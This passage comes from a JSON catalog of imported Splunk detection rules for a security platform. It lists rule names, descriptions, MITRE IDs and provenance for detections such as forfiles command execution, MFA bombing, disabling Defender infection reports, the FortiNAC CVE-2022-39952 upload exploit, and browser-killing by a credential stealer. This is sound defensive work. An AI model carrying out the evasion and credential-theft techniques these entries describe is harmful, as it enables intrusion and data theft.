"https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_excessive_security_scanning.yml" } }, { "id": "splunk-security-content-1fdf31c9-ff4d-4c48-b799-0e8666e08787", "type": "detection", "name": "Windows Indirect Command Execution Via forfiles", "description": "The following analytic detects the execution of programs initiated by forfiles.exe. This command is typically used to run commands on multiple files, often within batch scripts. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where forfiles.exe is the parent process. This activity is significant because forfiles.exe can be exploited to bypass command line execution protections, making it a potential vector for malicious activity. If confirmed malicious, this could allow attackers to execute arbitrary commands, potentially leading to unauthorized access or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-indirect-command-execution-via-forfiles.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1fdf31c9-ff4d-4c48-b799-0e8666e08787", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_indirect_command_execution_via_forfiles.yml" } }, { "id": "splunk-security-content-1fece617-e614-4329-9e61-3ba228c0f353", "type": "detection", "name": "AWS Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication (MFA) requests to an AWS Console for a single user. It leverages AWS CloudTrail logs, specifically the `additionalEventData` field, to detect more than 10 failed MFA prompts within 5 minutes. This activity is significant as it may indicate an adversary attempting to bypass MFA by bombarding the user with repeated authentication requests. If confirmed malicious, this could lead to unauthorized access to the AWS environment, potentially compromising sensitive data and resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-multiple-failed-mfa-requests-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1fece617-e614-4329-9e61-3ba228c0f353", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_multiple_failed_mfa_requests_for_user.yml" } }, { "id": "splunk-security-content-1ff7ccc8-065a-11ec-91e4-acde48001122", "type": "detection", "name": "Get ADDefaultDomainPasswordPolicy with Powershell Script Block", "description": "The following analytic detects the execution of the `Get-ADDefaultDomainPasswordPolicy` PowerShell cmdlet, which is used to retrieve the password policy in a Windows domain. This detection leverages PowerShell Script Block Logging (EventCode=4104) to identify the specific command execution. Monitoring this activity is significant as it can indicate an attempt to gather domain policy information, which is often a precursor to further malicious actions. If confirmed malicious, this activity could allow an attacker to understand password policies, aiding in password attacks or further domain enumeration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-addefaultdomainpasswordpolicy-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1ff7ccc8-065a-11ec-91e4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_addefaultdomainpasswordpolicy_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-1ff9eb9a-7d72-4993-a55e-59a839e607f1", "type": "detection", "name": "Internal Horizontal Port Scan", "description": "This analytic identifies instances where an internal host has attempted to communicate with 250 or more destination IP addresses using the same port and protocol. Horizontal port scans from internal hosts can indicate reconnaissance or scanning activities, potentially signaling malicious intent or misconfiguration. By monitoring network traffic logs, this detection helps detect and respond to such behavior promptly, enhancing network security and preventing potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/internal-horizontal-port-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1ff9eb9a-7d72-4993-a55e-59a839e607f1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/internal_horizontal_port_scan.yml" } }, { "id": "splunk-security-content-201022d7-a35c-470a-93ff-ae335c42e69d", "type": "detection", "name": "Cisco SD-WAN - Uncommon User-Agent Multi-URI Activity", "description": "This hunting search is designed to surface source IP activity using uncommon HTTP user-agents across multiple URI paths in Cisco SD-WAN Manager serviceproxy access logs.\nIt looks for source and user-agent combinations that access more than one distinct URI, then keeps only low-volume behavior (`requests<=50`) to reduce noise from normal high-volume traffic.\nUse this hunt to pivot on `http_user_agent` and `src` and identify possible automation, scripted reconnaissance, or exploitation attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1595" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-sd-wan-uncommon-user-agent-multi-uri-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "201022d7-a35c-470a-93ff-ae335c42e69d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_sd_wan___uncommon_user_agent_multi_uri_activity.yml" } }, { "id": "splunk-security-content-2015de95-fe91-413d-9d62-2fe011b67e82", "type": "detection", "name": "Windows Archive Collected Data via Rar", "description": "The following analytic identifies the execution of RAR utilities to archive files on a system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, GUIDs, and command-line arguments. This activity is significant as threat actors, including red-teamers and malware like DarkGate, use RAR archiving to compress and exfiltrate collected data from compromised hosts. If confirmed malicious, this behavior could lead to the unauthorized transfer of sensitive information to command and control servers, posing a severe risk to data confidentiality and integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-archive-collected-data-via-rar.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2015de95-fe91-413d-9d62-2fe011b67e82", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_archive_collected_data_via_rar.yml" } }, { "id": "splunk-security-content-201946c6-b1d5-42bb-a7e0-5f7123f47fc4", "type": "detection", "name": "Windows Impair Defense Disable Win Defender Report Infection", "description": "The following analytic detects modifications to the Windows registry that disable Windows Defender's infection reporting. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the \"DontReportInfectionInformation\" registry key. This activity is significant because it can prevent Windows Defender from reporting detailed threat information to Microsoft, potentially allowing malware to evade detection. If confirmed malicious, this action could enable attackers to bypass security measures, maintain persistence, and avoid detection, leading to prolonged unauthorized access and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-win-defender-report-infection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "201946c6-b1d5-42bb-a7e0-5f7123f47fc4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_win_defender_report_infection.yml" } }, { "id": "splunk-security-content-2032a95a-5165-11ec-a2c3-3e22fbd008af", "type": "detection", "name": "Randomly Generated Windows Service Name", "description": "The following analytic detects the installation of a Windows Service with a suspicious, high-entropy name, indicating potential malicious activity. It leverages Event ID 7045 and the `ut_shannon` function from the URL ToolBox Splunk application to identify services with random names. This behavior is significant as adversaries often use randomly named services for lateral movement and remote code execution. If confirmed malicious, this activity could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/randomly-generated-windows-service-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2032a95a-5165-11ec-a2c3-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/randomly_generated_windows_service_name.yml" } }, { "id": "splunk-security-content-2038f5c6-5aba-4221-8ae2-ca76e2ca8b97", "type": "detection", "name": "Exploit Public-Facing Fortinet FortiNAC CVE-2022-39952", "description": "The following analytic detects attempts to exploit the Fortinet FortiNAC CVE-2022-39952 vulnerability. It identifies HTTP POST requests to the URI configWizard/keyUpload.jsp with a payload.zip file.\nThe detection leverages the Web datamodel, analyzing fields such as URL, HTTP method, and user agent.\nThis activity is significant as it indicates an attempt to exploit a known vulnerability, potentially leading to remote code execution.\nIf confirmed malicious, attackers could gain control over the affected system, schedule malicious tasks, and establish persistent access via a remote command and control (C2) server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/exploit-public-facing-fortinet-fortinac-cve-2022-39952.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2038f5c6-5aba-4221-8ae2-ca76e2ca8b97", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/exploit_public_facing_fortinet_fortinac_cve_2022_39952.yml" } }, { "id": "splunk-security-content-203ef0ea-9bd8-11eb-8201-acde48001122", "type": "detection", "name": "WinEvent Scheduled Task Created to Spawn Shell", "description": "The following analytic detects the creation of scheduled tasks designed to execute commands using native Windows shells like PowerShell, Cmd, Wscript, or Cscript. It leverages Windows Security EventCode 4698 to identify when such tasks are registered. This activity is significant as it may indicate an attempt to establish persistence or execute malicious commands on a system. If confirmed malicious, this could allow an attacker to maintain access, execute arbitrary code, or escalate privileges, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/winevent-scheduled-task-created-to-spawn-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "203ef0ea-9bd8-11eb-8201-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/winevent_scheduled_task_created_to_spawn_shell.yml" } }, { "id": "splunk-security-content-20901256-633a-40de-8753-7b88811a460f", "type": "detection", "name": "Linux Auditd Sysmon Service Stop", "description": "The following analytic detects the suspicious sysmon service stop. This behavior is critical for a SOC to monitor because it may indicate attempts to gain unauthorized access or maintain control over a system. Such actions could be signs of malicious activity. If confirmed, this could lead to serious consequences, including a compromised system, unauthorized access to sensitive data, or even a wider breach affecting the entire network. Detecting and responding to these signs early is essential to prevent potential security incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-sysmon-service-stop.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "20901256-633a-40de-8753-7b88811a460f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_sysmon_service_stop.yml" } }, { "id": "splunk-security-content-20ba6c32-c733-4a32-b64e-2688cf231399", "type": "detection", "name": "Suspicious PlistBuddy Usage via OSquery", "description": "The following analytic detects the use of the PlistBuddy utility on macOS to create or modify property list (.plist) files. It leverages OSQuery to monitor process events, specifically looking for commands that interact with LaunchAgents and set properties like RunAtLoad. This activity is significant because PlistBuddy can be used to establish persistence mechanisms, as seen in malware like Silver Sparrow. If confirmed malicious, this could allow an attacker to maintain persistence, execute arbitrary commands, and potentially escalate privileges on the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1543.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/suspicious-plistbuddy-usage-via-osquery.yaml", "provenance": { "source": "splunk/security_content", "source_id": "20ba6c32-c733-4a32-b64e-2688cf231399", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_plistbuddy_usage_via_osquery.yml" } }, { "id": "splunk-security-content-20db5f70-34b4-4e83-8926-fa26119de173", "type": "detection", "name": "Windows IIS Components Get-WebGlobalModule Module Query", "description": "The following analytic identifies the execution of the PowerShell cmdlet Get-WebGlobalModule, which lists all IIS Modules installed on a system. It leverages PowerShell input data to detect this activity by capturing the module names and the image paths of the DLLs. This activity is significant for a SOC because it can indicate an attempt to enumerate installed IIS modules, which could be a precursor to exploiting vulnerabilities or misconfigurations. If confirmed malicious, this could allow an attacker to gain insights into the web server's configuration, potentially leading to further exploitation or privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-iis-components-get-webglobalmodule-module-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "20db5f70-34b4-4e83-8926-fa26119de173", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_iis_components_get_webglobalmodule_module_query.yml" } }, { "id": "splunk-security-content-21083dcb-276d-4ef9-8f7e-2113ca5e8094", "type": "detection", "name": "GitHub Enterprise Pause Audit Log Event Stream", "description": "The following analytic detects when a user pauses audit log event streaming in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for configuration changes that temporarily suspend the audit log streaming functionality, which is used to send audit events to security monitoring platforms. This behavior could indicate an attacker attempting to prevent their malicious activities from being logged and detected by temporarily disabling the audit trail. For a SOC, identifying the pausing of audit logging is critical as it may be a precursor to other attacks where adversaries want to operate undetected during the pause window. The impact could be severe as organizations temporarily lose visibility into user actions, configuration changes, and security events within their GitHub Enterprise environment, potentially allowing attackers to perform malicious activities without detection during the pause period. This creates a temporary blind spot in security monitoring and incident response capabilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-pause-audit-log-event-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "21083dcb-276d-4ef9-8f7e-2113ca5e8094", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_pause_audit_log_event_stream.yml" } }, { "id": "splunk-security-content-211b80d3-6340-4345-11ad-212bf3d0d111", "type": "detection", "name": "AWS Lambda UpdateFunctionCode", "description": "The following analytic identifies IAM users attempting to update or modify AWS Lambda code via the AWS CLI. It leverages CloudTrail logs to detect successful `UpdateFunctionCode` events initiated by IAM users. This activity is significant as it may indicate an attempt to gain persistence, further access, or plant backdoors within your AWS environment. If confirmed malicious, an attacker could upload and execute malicious code automatically when the Lambda function is triggered, potentially compromising the integrity and security of your AWS infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-lambda-updatefunctioncode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "211b80d3-6340-4345-11ad-212bf3d0d111", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_lambda_updatefunctioncode.yml" } }, { "id": "splunk-security-content-213b3148-24ea-11ec-93a2-acde48001122", "type": "detection", "name": "MSBuild Suspicious Spawned By Script Process", "description": "The following analytic detects the suspicious spawning of MSBuild.exe by Windows Script Host processes (cscript.exe or wscript.exe). This behavior is often associated with malware or adversaries executing malicious MSBuild processes via scripts on compromised hosts. The detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process creation events where MSBuild is a child of script hosts. This activity is significant as it may indicate an attempt to execute malicious code. If confirmed malicious, it could lead to unauthorized code execution, potentially compromising the host and allowing further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/msbuild-suspicious-spawned-by-script-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "213b3148-24ea-11ec-93a2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml" } }, { "id": "splunk-security-content-21421896-a692-4594-9888-5faeb8a53106", "type": "detection", "name": "O365 Mailbox Inbox Folder Shared with All Users", "description": "The following analytic detects instances where the inbox folder of an Office 365 mailbox is shared with all users within the tenant. It leverages Office 365 management activity events to identify when the 'Inbox' folder permissions are modified to include 'Everyone' with read rights. This activity is significant as it represents a potential security risk, allowing unauthorized access to sensitive emails. If confirmed malicious, this could lead to data breaches, exfiltration of confidential information, and further compromise through spear-phishing or other malicious activities based on the accessed email content.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-mailbox-inbox-folder-shared-with-all-users.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "21421896-a692-4594-9888-5faeb8a53106", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_mailbox_inbox_folder_shared_with_all_users.yml" } }, { "id": "splunk-security-content-21432e40-04f4-11ec-b7e6-acde48001122", "type": "detection", "name": "Get ADUser with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-AdUser` PowerShell cmdlet, which is used to enumerate all domain users. It leverages PowerShell Script Block Logging (EventCode=4104) to identify instances where this command is executed with a filter. This activity is significant as it may indicate an attempt by adversaries or Red Teams to gather information about domain users for situational awareness and Active Directory discovery. If confirmed malicious, this behavior could lead to further reconnaissance and potential exploitation of user accounts within the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-aduser-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "21432e40-04f4-11ec-b7e6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_aduser_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-2181ad1f-1e73-4d0c-9780-e8880482a08f", "type": "detection", "name": "Cloud API Calls From Previously Unseen User Roles", "description": "The following analytic detects cloud API calls executed by user roles that have not previously run these commands. It leverages the Change data model in Splunk to identify commands executed by users with the user_type of AssumedRole and a status of success. This activity is significant because new commands from different user roles can indicate potential malicious activity or unauthorized actions. If confirmed malicious, this behavior could lead to unauthorized access, data breaches, or other damaging outcomes by exploiting new or unmonitored commands within the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-api-calls-from-previously-unseen-user-roles.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2181ad1f-1e73-4d0c-9780-e8880482a08f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_api_calls_from_previously_unseen_user_roles.yml" } }, { "id": "splunk-security-content-2181f261-93e6-4166-a5a9-47deac58feff", "type": "detection", "name": "Windows Information Discovery Fsutil", "description": "The following analytic identifies the execution of the Windows built-in tool FSUTIL with the \"FSINFO\" or \"Volume\" parameters, in order to discover file system and disk information.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details.\nMonitoring this activity is significant because FSUTIL can be abused by adversaries to gather detailed information about the file system, aiding in further exploitation.\nIf confirmed malicious, this activity could enable attackers to map the file system, identify valuable data, and plan subsequent actions such as privilege escalation or persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-information-discovery-fsutil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2181f261-93e6-4166-a5a9-47deac58feff", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_information_discovery_fsutil.yml" } }, { "id": "splunk-security-content-218bf991-6c63-4c26-a682-6ac1a53ad8f8", "type": "detection", "name": "ESXi External Root Login Activity", "description": "This detection identifies instances where the ESXi UI is accessed using the root account instead of a delegated administrative user. Direct root access to the UI bypasses role-based access controls and auditing practices, and may indicate risky behavior, misconfiguration, or unauthorized activity by a malicious actor using compromised credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-external-root-login-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "218bf991-6c63-4c26-a682-6ac1a53ad8f8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_external_root_login_activity.yml" } }, { "id": "splunk-security-content-21af5447-734f-4549-956b-7a255cb2b032", "type": "detection", "name": "HTTP PUA User Agent", "description": "This Splunk query analyzes web logs to identify and categorize user agents, detecting various types of unwanted applications. This activity can signify possible compromised hosts on the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-pua-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "21af5447-734f-4549-956b-7a255cb2b032", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/http_pua_user_agent.yml" } }, { "id": "splunk-security-content-21c5af91-1a4a-4511-8603-64fb41df3fad", "type": "detection", "name": "Windows SIP Provider Inventory", "description": "The following analytic identifies all SIP (Subject Interface Package) providers on a Windows system using PowerShell scripted inputs. It detects SIP providers by capturing DLL paths from relevant events. This activity is significant because malicious SIP providers can be used to bypass trust controls, potentially allowing unauthorized code execution. If confirmed malicious, this activity could enable attackers to subvert system integrity, leading to unauthorized access or persistent threats within the environment. Analysts should review for new and non-standard paths to identify potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sip-provider-inventory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "21c5af91-1a4a-4511-8603-64fb41df3fad", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sip_provider_inventory.yml" } }, { "id": "splunk-security-content-21cbcaf1-b51f-496d-a0c1-858ff3070452", "type": "detection", "name": "Windows Modify Registry Disabling WER Settings", "description": "The following analytic detects modifications in the Windows registry to disable Windows Error Reporting (WER) settings. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to registry paths related to WER with a value set to \"0x00000001\". This activity is significant as adversaries may disable WER to suppress error notifications, hiding the presence of malicious activities. If confirmed malicious, this could allow attackers to operate undetected, potentially leading to prolonged persistence and further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disabling-wer-settings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "21cbcaf1-b51f-496d-a0c1-858ff3070452", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disabling_wer_settings.yml" } }, { "id": "splunk-security-content-220d34b7-b6c7-45fe-8dbb-c35cdd9fe6d5", "type": "detection", "name": "Windows Disable or Stop Browser Process", "description": "The following analytic detects the use of the taskkill command in a process command line to terminate several known browser processes, a technique commonly employed by the Braodo stealer malware to steal credentials. By forcefully closing browsers like Chrome, Edge, and Firefox, the malware can unlock files that store sensitive 